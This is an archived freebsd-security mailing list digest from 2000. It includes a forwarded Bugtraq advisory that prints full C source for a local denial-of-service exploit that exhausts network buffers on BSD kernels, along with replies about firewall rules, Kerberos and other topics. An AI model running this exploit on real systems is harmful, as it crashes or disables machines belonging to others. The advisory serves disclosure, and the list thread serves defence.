08:12:24 -0300 X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Message-ID: Date: Wed, 2 Aug 2000 08:41:53 -0300 Reply-To: Ussr Labs From: Ussr Labs X-To: BUGTRAQ To: BUGTRAQ@SECURITYFOCUS.COM Subject: Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability - Mac OS X affected X-Resent-Mailer: Mulberry/2.0.0 (MacOS) X-OS: MacOS X-List: BUGTRAQ MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability Release Date: April 29, 2000 Systems Affected: FreeBSD 3.3-RELEASE FreeBSD 4.0-RELEASE FreeBSD 5.0 (maybe) Openbsd 2.5 Openbsd 2.6 Openbsd 2.7 (maybe) NetBSD 1.4.1 THE PROBLEM - From an original posting made about last September by Sven Berkenvs (sven@ILSE.NL) to bugtraq: - --- Forward --- I stumbled across a denial of service attack on FreeBSD systems, where an unpriviledged user can panic the kernel. Quick and dirty testing (code attached at the end of this mail) showed OpenBSD is vulnerable too: FreeBSD - 3.2-RELEASE: the kernel panics. I haven't had a chance to test it on older FreeBSD versions. OpenBSD 2.4 - GENERIC kernel & OpenBSD 2.5-current with NMBSCLUSTERS=8192: The kernel logs one "/bsd: mb_map full" and all processes trying to send something over the network get stuck waiting in mbuf. Locally the system continues to function. Tested by a friend. NetBSD: Not available, but it is highly probable that the affected code in OpenBSD is from its parent NetBSD. - --- End of Forward --- Upon testing this code on the new versions of *bsd the exploit still works. FreeBSD - 3.3-RELEASE: reboots the pc FreeBSD - 4.0-RELEASE and 4.0-STABLE as of May 25, 2000: in the logs recieves /kernel: xl0: no memory for rx list -- packet dropped! All network connection is dead and the route table is a mess. FreeBSD - 5.0-Current: Untested Openbsd - 2.5 (with NMBCLUSTERS=8192): mb_map full Openbsd - 2.6 (with patches up to May 25, 2000): mb_map full Openbsd - 2.7: Untested NetBSD - 1.4.1: /netbsd: WARNING: mclpool limit reached; increase NMBCLUS The network connection is dead. NetBSD - 1.4.2: Untested - From what I have tested on, Linux does not have any issue with this piece of code. As for the other unices, they have not been tested. THE CODE The original code written by Sven Berkenvs that causes this: #include #include #include #define BUFFERSIZE 204800 extern int main(void) { int p[2], i; char crap[BUFFERSIZE]; while (1) { if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) break; i = BUFFERSIZE; setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); fcntl(p[0], F_SETFL, O_NONBLOCK); fcntl(p[1], F_SETFL, O_NONBLOCK); write(p[0], crap, BUFFERSIZE); write(p[1], crap, BUFFERSIZE); } exit(0); } Underground Security Systems Research http://www.ussrback.com Greetings: Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM, HNN, Sub, prizm, b0f,Technotronic and Rfp. Disclaimer: The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. Feedback: Please send suggestions, updates, and comments to: Underground Security Systems Research mail:labs@ussrback.com http://www.ussrback.com -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 6.5.2 for non-commercial use iQA/AwUBOYgJAK3JcbWNj6DDEQJNMQCgzvEMALCmfNJ9EpPVF1uRNFiniC8AoKsV ucQIKYXTFMT6TzTx3JNHVw0L =LDeL -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 15:40:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with SMTP id 17B3B37B506 for ; Tue, 13 Jun 2000 15:40:31 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 30831 invoked by uid 1000); 13 Jun 2000 22:40:29 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 13 Jun 2000 22:40:29 -0000 Date: Tue, 13 Jun 2000 17:40:29 -0500 (CDT) From: Mike Silbersack To: security@freebsd.org Subject: Re: Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability - Mac OS X affected In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hmmm, could the lists be changed to require that their name is in the To: or Cc: of any message posted to them? It would be nice to see bounces like this one blocked. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 16:25: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from ocis.ocis.net (ocis.ocis.net [209.52.173.1]) by hub.freebsd.org (Postfix) with ESMTP id B74C037BE5C for ; Tue, 13 Jun 2000 16:25:05 -0700 (PDT) (envelope-from vdrifter@ocis.ocis.net) Received: from localhost (vdrifter@localhost) by ocis.ocis.net (8.9.3/8.9.3) with ESMTP id QAA23121 for ; Tue, 13 Jun 2000 16:25:04 -0700 Date: Tue, 13 Jun 2000 16:25:04 -0700 (PDT) From: John F Cuzzola To: security@FreeBSD.ORG Subject: ipfw log entry Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi everyone, On one of our firewalls numerous entries looking like this were logged: ipfw: -1 Refuse TCP 209.1.224.16 107.13.119.32 in via ep3 Fragment = 147 I haven't seen this one before. Is this a packet that FreeBSD explicitly blocks regardless of the firewall rules and if so what is its intent/purpose? (Basically what I'm asking is does this look like hacker activity). Thanks To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 21:12:53 2000 Delivered-To: freebsd-security@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 542) id E234E37BB90; Tue, 13 Jun 2000 21:12:51 -0700 (PDT) Date: Tue, 13 Jun 2000 21:12:51 -0700 From: "Andrey A. Chernov" To: Igor Roshchin Cc: security@freebsd.org Subject: Re: wu-ftpd vulnerability - is FreeBSD's port vulnerable ? Message-ID: <20000613211251.A86351@freebsd.org> References: <200006132210.SAA61771@giganda.komkon.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <200006132210.SAA61771@giganda.komkon.org>; from str@giganda.komkon.org on Tue, Jun 13, 2000 at 06:10:02PM -0400 Organization: Biomechanoid Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Jun 13, 2000 at 06:10:02PM -0400, Igor Roshchin wrote: > assumption it will be zeroed - could be, I guess). Aah, an example?;): > USER ;) No, no SEGV or crash, simply > overwritten piece of memory. Some debugging would be nice. I can say even without debugging that to activate this overflow near 128 bytes user name must be present in /etc/passwd -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 22:25:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from ecpi.com (ns1.ecpi.com [216.141.24.3]) by hub.freebsd.org (Postfix) with ESMTP id 02E5E37BB4B for ; Tue, 13 Jun 2000 22:25:11 -0700 (PDT) (envelope-from tpatel@ecpi.com) Received: (from tpatel@localhost) by ecpi.com (8.8.8/8.8.8) id AAA22768; Wed, 14 Jun 2000 00:18:21 -0500 (CDT) From: Tushar Patel Message-Id: <200006140518.AAA22768@ecpi.com> Subject: Kerberos for POP, radius, ftp etc To: freebsd-security@freebsd.org Date: Wed, 14 Jun 2000 00:18:21 -0500 (CDT) X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org We want to move our authentication server as kerberos base. We have many users (700+) who get authenticated using radius server ( MD5 password data base). They also use same password for the POP mail and ftp. Is it possible to populate kerberos database from the exsisting MD5 password data base? Is ftpd and POP3d deamon kerberrized? Can we setup failover kerberos authentication server? Can some body point me in the right direction on the subject? Thanks, Tushar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 23:15:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.rdc2.occa.home.com (ha1.rdc2.occa.home.com [24.2.8.66]) by hub.freebsd.org (Postfix) with ESMTP id B673637BB5B for ; Tue, 13 Jun 2000 23:15:10 -0700 (PDT) (envelope-from wintermage@home.com) Received: from cx799821a ([24.16.70.74]) by mail.rdc2.occa.home.com (InterMail vM.4.01.02.00 201-229-116) with SMTP id <20000614061510.PKTK13133.mail.rdc2.occa.home.com@cx799821a> for ; Tue, 13 Jun 2000 23:15:10 -0700 Message-ID: <000901bfd5c7$fa6fc3a0$4a461018@dnpt1.occa.home.com> From: "Chaosmage" To: Subject: subscribe Date: Tue, 13 Jun 2000 23:15:46 -0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0006_01BFD58D.4DEF59E0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0006_01BFD58D.4DEF59E0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable subscribe ------=_NextPart_000_0006_01BFD58D.4DEF59E0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
subscribe
------=_NextPart_000_0006_01BFD58D.4DEF59E0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 14 2:14:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from eastwood.aldigital.algroup.co.uk (eastwood.aldigital.algroup.co.uk [194.128.162.193]) by hub.freebsd.org (Postfix) with ESMTP id 4C41637BD97 for ; Wed, 14 Jun 2000 02:14:11 -0700 (PDT) (envelope-from adam@algroup.co.uk) Received: from algroup.co.uk ([193.195.56.225]) by eastwood.aldigital.algroup.co.uk (8.8.8/8.6.12) with ESMTP id JAA17926; Wed, 14 Jun 2000 09:13:35 GMT Message-ID: <39474CBF.30869244@algroup.co.uk> Date: Wed, 14 Jun 2000 10:13:35 +0100 From: Adam Laurie Organization: A.L. Group plc X-Mailer: Mozilla 4.72 [en] (Win95; U) X-Accept-Language: en MIME-Version: 1.0 To: Hugh Ho Cc: freebsd-security@freebsd.org Subject: Re: IPFW rules for DNS? References: <20000613014237.10942.qmail@web210.mail.yahoo.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hugh Ho wrote: > > I need to do nslookup quite often, and I have the following IPFW rules which > allow nslookup to talk to my ISP's DNS server: > > allow udp from ${my_ip} to ${dns_server} 53 > allow udp from ${dns_server} 53 to ${my_ip} > > Problem with the above rules is that people can pass IPFW if they use UDP port > 53 with a spoofed IP that matches my ISP's DNS server. Is there a way to fix my > problem? $fwcmd add pass udp from any to ${dns_server} 53 $fwcmd add deny log udp from any to ${my_ip} 0-1023,1110,2049 $fwcmd add pass udp from any to any This blocks low port udp plus high ports used by NFS (you need to add any others you might be using) but allows the high port DNS replies. You will get occasional DNS lookup failures when the client happens to choose port 1110 or 2049 for it's reply listener. cheers, Adam -- Adam Laurie Tel: +44 (181) 742 0755 A.L. Digital Ltd. Fax: +44 (181) 742 5995 Voysey House Barley Mow Passage http://www.aldigital.co.uk London W4 4GB mailto:adam@algroup.co.uk UNITED KINGDOM PGP key on keyservers To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 14 4:27:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from drawbridge.ctc.com (drawbridge.ctc.com [147.160.99.35]) by hub.freebsd.org (Postfix) with ESMTP id 0BE9537B667 for ; Wed, 14 Jun 2000 04:27:08 -0700 (PDT) (envelope-from cameron@ctc.com) Received: from server2.ctc.com (server2.ctc.com [147.160.1.4]) by drawbridge.ctc.com (8.10.1/8.10.1) with ESMTP id e5EBR5F10774; Wed, 14 Jun 2000 07:27:06 -0400 (EDT) Received: from ctcjst-mail1.ctc.com (ctcjst-mail1.ctc.com [147.160.34.4]) by server2.ctc.com (8.9.3/8.9.3) with ESMTP id HAA18143; Wed, 14 Jun 2000 07:26:56 -0400 (EDT) Received: by ctcjst-mail1.ctc.com with Internet Mail Service (5.5.2650.21) id ; Wed, 14 Jun 2000 07:27:43 -0400 Message-ID: From: "Cameron, Frank" To: "'Hugh Ho'" Cc: "'freebsd-security@FreeBSD.ORG'" Subject: RE: IPFW rules for DNS? Date: Wed, 14 Jun 2000 07:27:42 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The recent ipfw supports the keep-state option: allow udp from ${my_ip} to ${dns_server} 53 keep-state -frank > -----Original Message----- > From: Hugh Ho [SMTP:hho321@yahoo.com] > Sent: Monday, June 12, 2000 9:43 PM > To: freebsd-security@FreeBSD.ORG > Subject: IPFW rules for DNS? > > I need to do nslookup quite often, and I have the following IPFW rules > which > allow nslookup to talk to my ISP's DNS server: > > allow udp from ${my_ip} to ${dns_server} 53 > allow udp from ${dns_server} 53 to ${my_ip} > > Problem with the above rules is that people can pass IPFW if they use UDP > port > 53 with a spoofed IP that matches my ISP's DNS server. Is there a way to > fix my > problem? > > Thanks. > > -Hugh > > __________________________________________________ > Do You Yahoo!? > Yahoo! Photos -- now, 100 FREE prints! > http://photos.yahoo.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 14 7:19:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 53DDF37B68F for ; Wed, 14 Jun 2000 07:19:42 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA18193; Wed, 14 Jun 2000 07:19:03 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda18191; Wed Jun 14 07:18:45 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id HAA30670; Wed, 14 Jun 2000 07:18:45 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpde30668; Wed Jun 14 07:17:45 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.10.2/8.9.1) id e5EEHi431392; Wed, 14 Jun 2000 07:17:44 -0700 (PDT) Message-Id: <200006141417.e5EEHi431392@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdo31385; Wed Jun 14 07:16:50 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.0-STABLE X-Sender: cy To: Tushar Patel Cc: freebsd-security@FreeBSD.ORG Subject: Re: Kerberos for POP, radius, ftp etc In-reply-to: Your message of "Wed, 14 Jun 2000 00:18:21 CDT." <200006140518.AAA22768@ecpi.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 14 Jun 2000 07:16:50 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200006140518.AAA22768@ecpi.com>, Tushar Patel writes: > > > We want to move our authentication server as kerberos base. > We have many users (700+) who get authenticated using radius server ( > MD5 password data base). They also use same password for the POP > mail and ftp. > > Is it possible to populate kerberos database from the exsisting MD5 password > data base? No. > > Is ftpd and POP3d deamon kerberrized? The MIT ftpd is kerberized. The FreeBSD daemon is also, with the right compile options, kerberized. You can get kerberized pop3d daemons. > > Can we setup failover kerberos authentication server? Yes > > > Can some body point me in the right direction on the subject? Read the docs that come with MIT Kerberos. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 14 7:58:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from ecpi.com (ns1.ecpi.com [216.141.24.3]) by hub.freebsd.org (Postfix) with ESMTP id 9EA1637B6BA for ; Wed, 14 Jun 2000 07:58:33 -0700 (PDT) (envelope-from tpatel@ecpi.com) Received: (from tpatel@localhost) by ecpi.com (8.8.8/8.8.8) id JAA08402; Wed, 14 Jun 2000 09:51:39 -0500 (CDT) From: Tushar Patel Message-Id: <200006141451.JAA08402@ecpi.com> Subject: Re: Kerberos for POP, radius, ftp etc In-Reply-To: <200006141417.e5EEHi431392@cwsys.cwsent.com> from Cy Schubert - ITSD Open Systems Group at "Jun 14, 0 07:16:50 am" To: Cy.Schubert@uumail.gov.bc.ca Date: Wed, 14 Jun 2000 09:51:38 -0500 (CDT) Cc: freebsd-security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Is it possible to populate kerberos database from the exsisting MD5 password > > data base? > > No. Can we not copy the password from the master.password file and put it in the file struture of the kerberos? So, how do people change the authentication process to kerberos without involving the end user? Thanks, Tushar > > > > > Is ftpd and POP3d deamon kerberrized? > > The MIT ftpd is kerberized. The FreeBSD daemon is also, with the right > compile options, kerberized. > > You can get kerberized pop3d daemons. > > > > > Can we setup failover kerberos authentication server? > > Yes > > > > > > > Can some body point me in the right direction on the subject? > > Read the docs that come with MIT Kerberos. > > > Regards, Phone: (250)387-8437 > Cy Schubert Fax: (250)387-5766 > Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca > Open Systems Group, ITSD, ISTA > Province of BC > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 14 8:16:26 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.euroweb.hu (mail.euroweb.hu [193.226.220.4]) by hub.freebsd.org (Postfix) with ESMTP id A050D37C393 for ; Wed, 14 Jun 2000 08:16:15 -0700 (PDT) (envelope-from hu006co@mail.euroweb.hu) Received: (from hu006co@localhost) by mail.euroweb.hu (8.8.5/8.8.5) id RAA04897 for freebsd-security@freebsd.org; Wed, 14 Jun 2000 17:16:13 +0200 (MET DST) Received: (from zgabor@localhost) by CoDe.hu (8.9.3/8.8.8) id RAA00623 for freebsd-security@freebsd.org; Wed, 14 Jun 2000 17:11:30 +0200 (CEST) (envelope-from zgabor) Date: Wed, 14 Jun 2000 17:11:30 +0200 From: Gabor Zahemszky To: freebsd-security@freebsd.org Subject: Re: rc.network firewall init Message-ID: <20000614171130.E471@zg.CoDe.hu> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: ; from freebsd-contact@research.poc.net on Tue, Jun 13, 2000 at 03:26:45PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Jun 13, 2000 at 03:26:45PM -0400, freebsd-contact@research.poc.net wrote: > I've noticed that FreeBSD 4.0's /etc/rc.network brings up network > interfaces before initializing firewall behavior. > > In the case of IPFIREWALL, when not compiled into the kernel, this causes > a short window of 'exposure' during startup. In the time between network > connectivity being established, and the IPFIREWALL KLD being loaded, all > interfaces are up and unfiltered. (An almost identical problem exists > even when IPFIREWALL *is* compiled into the kernel, but the kernel option > IPFIREWALL_DEFAULT_TO_ACCEPT is specified.) > > One successful TCP handshake during this window can establish a connection > that survives the firewall loading, due to IPFIREWALL's non-statefulness 1) Well, in 4.x ipfw _is_ statefull, but as a new feature, maybe not so many people use it. 2) This problem exists, if somebody is using the other firewall, ipf, as it's default actions are pass (yes, we can change it with that non-documented option) options IPFILTER_DEFAULT_BLOCK #kernel ipfilter default block Conclusion: don't use a KLD firewall! (or maybe somebody will restructure out rc.network script, and put that changes, which will make it easier to use ipf instead of ipfw.) ZGabor at CoDe dot HU -- #!/bin/ksh Z='21N16I25C25E30, 40M30E33E25T15U!' ;IFS=' ABCDEFGHIJKLMNOPQRSTUVWXYZ ';set $Z ;for i { [[ $i = ? ]]&&print $i&&break;[[ $i = ??? ]]&&j=$i&&i=${i%?};typeset -i40 i=8#$i;print -n ${i#???};[[ "$j" = ??? ]]&&print -n "${j#??} "&&j=;typeset +i i;};IFS=' 0123456789 ';set $Z;X=;for i { [[ $i = , ]]&&i=2;[[ $i = ?? ]]||typeset -l i;X="$X $i";typeset +l i;};print "$X" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 14 8:46:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from rip.psg.com (rip.psg.com [147.28.0.39]) by hub.freebsd.org (Postfix) with ESMTP id 2184337C27D for ; Wed, 14 Jun 2000 08:46:15 -0700 (PDT) (envelope-from randy@psg.com) Received: from randy by roam.psg.com with local (Exim 3.12 #1) id 131UVW-0000t6-00 for freebsd-security@freebsd.org; Mon, 12 Jun 2000 22:44:02 +0900 From: Randy Bush MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: freebsd-security@freebsd.org Subject: netscape and /etc/pwd.db Message-Id: Date: Mon, 12 Jun 2000 22:44:02 +0900 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org oddity from logs. Jun 11 10:48:22 foux navigator-4.73.us.bin: /etc/pwd.db: Invalid argument Jun 11 10:54:39 foux navigator-4.73.us.bin: /etc/pwd.db: Invalid argument i was not on the same continent as my workstation when this was logged. any hints? randy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 14 9:19:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from srh0902.urh.uiuc.edu (srh0902.urh.uiuc.edu [130.126.76.224]) by hub.freebsd.org (Postfix) with SMTP id 4B55837C1CC for ; Wed, 14 Jun 2000 09:19:38 -0700 (PDT) (envelope-from ftobin@uiuc.edu) Received: (qmail 77243 invoked by uid 1000); 14 Jun 2000 16:19:35 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 14 Jun 2000 16:19:35 -0000 Date: Wed, 14 Jun 2000 11:19:35 -0500 (CDT) From: Frank Tobin X-Sender: ftobin@srh0902.urh.uiuc.edu To: FreeBSD-security mailing list Subject: Re: Kerberos for POP, radius, ftp etc In-Reply-To: <200006141451.JAA08402@ecpi.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Tushar Patel, at 09:51 -0500 on Wed, 14 Jun 2000, wrote: > Can we not copy the password from the master.password file and put it in the > file struture of the kerberos? Different passphrase mechanisms. > So, how do people change the authentication process to kerberos without > involving the end user? Put a temporary mechniasm into your login daemons to sniff passwords so you can then initialize your kdc for a user when he/she next logs in :) -- Frank Tobin http://www.uiuc.edu/~ftobin/ "To learn what is good and what is to be valued, those truths which cannot be shaken or changed." Myst: The Book of Atrus To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 14 9:25: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from zibbi.mikom.csir.co.za (zibbi.mikom.csir.co.za [146.64.24.58]) by hub.freebsd.org (Postfix) with ESMTP id C15B337C28B for ; Wed, 14 Jun 2000 09:24:55 -0700 (PDT) (envelope-from jhay@zibbi.mikom.csir.co.za) Received: (from jhay@localhost) by zibbi.mikom.csir.co.za (8.10.1/8.10.1) id e5EGOdb09165; Wed, 14 Jun 2000 18:24:39 +0200 (SAT) From: John Hay Message-Id: <200006141624.e5EGOdb09165@zibbi.mikom.csir.co.za> Subject: Re: netscape and /etc/pwd.db In-Reply-To: from Randy Bush at "Jun 12, 2000 10:44:02 pm" To: randy@psg.com (Randy Bush) Date: Wed, 14 Jun 2000 18:24:39 +0200 (SAT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL54 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > oddity from logs. > > Jun 11 10:48:22 foux navigator-4.73.us.bin: /etc/pwd.db: Invalid argument > Jun 11 10:54:39 foux navigator-4.73.us.bin: /etc/pwd.db: Invalid argument > > i was not on the same continent as my workstation when this was logged. any > hints? I have seen this only when trying to start a second netscape. It has been like that for years. John -- John Hay -- John.Hay@mikom.csir.co.za To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 14 9:39:25 2000 Delivered-To: freebsd-security@freebsd.org Received: from closed-networks.com (closed-networks.com [195.153.248.242]) by hub.freebsd.org (Postfix) with SMTP id 746C337C001 for ; Wed, 14 Jun 2000 09:39:21 -0700 (PDT) (envelope-from udp@closed-networks.com) Received: (qmail 23212 invoked by uid 1021); 14 Jun 2000 16:47:06 -0000 Mail-Followup-To: freebsd-security@freebsd.org, labs@USSRBACK.COM Date: Wed, 14 Jun 2000 17:47:06 +0100 From: User Datagram Protocol To: freebsd-security@freebsd.org, Ussr Labs Subject: Re: Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability - Mac OS X affected Message-ID: <20000614174706.F78775@closed-networks.com> Reply-To: User Datagram Protocol References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from labs@USSRBACK.COM on Wed, Aug 02, 2000 at 08:41:53AM -0300 X-Echelon: MI6 Cobra GCHQ Panavia MI5 Timberline IRA NSA Mossad CIA Copperhead Organization: Closed Networks Limited, London, UK Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Eww. What a lame DoS attack. On Wed, Aug 02, 2000 at 08:41:53AM -0300, Ussr Labs wrote: > an unpriviledged user can panic the kernel. Quick and dirty testing > ... Big deal. So what do we do about it? Implement per-process mbuf usage limits? Eww. -- Bruce M. Simpson aka 'udp' Security Analyst & UNIX Development Engineer WWW: www.closed-networks.com/~udp Dundee www.packetfactory.net/~udp United Kingdom email: udp@closed-networks.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 14 9:41:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from sivka.rdy.com (sivka.rdy.com [207.33.166.86]) by hub.freebsd.org (Postfix) with ESMTP id ABFB237C38D for ; Wed, 14 Jun 2000 09:41:22 -0700 (PDT) (envelope-from dima@rdy.com) Received: (from dima@localhost) by sivka.rdy.com (8.9.3/8.9.3) id JAA21477; Wed, 14 Jun 2000 09:40:46 -0700 (PDT) (envelope-from dima) Message-Id: <200006141640.JAA21477@sivka.rdy.com> Subject: Re: netscape and /etc/pwd.db In-Reply-To: "from Randy Bush at Jun 12, 2000 10:44:02 pm" To: Randy Bush Date: Wed, 14 Jun 2000 09:40:46 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG Organization: HackerDome Reply-To: dima@rdy.com From: dima@rdy.com (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL77 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Randy Bush writes: > oddity from logs. > > Jun 11 10:48:22 foux navigator-4.73.us.bin: /etc/pwd.db: Invalid argument > Jun 11 10:54:39 foux navigator-4.73.us.bin: /etc/pwd.db: Invalid argument > > i was not on the same continent as my workstation when this was logged. any > hints? It happens either when you attempt to start second netscape, 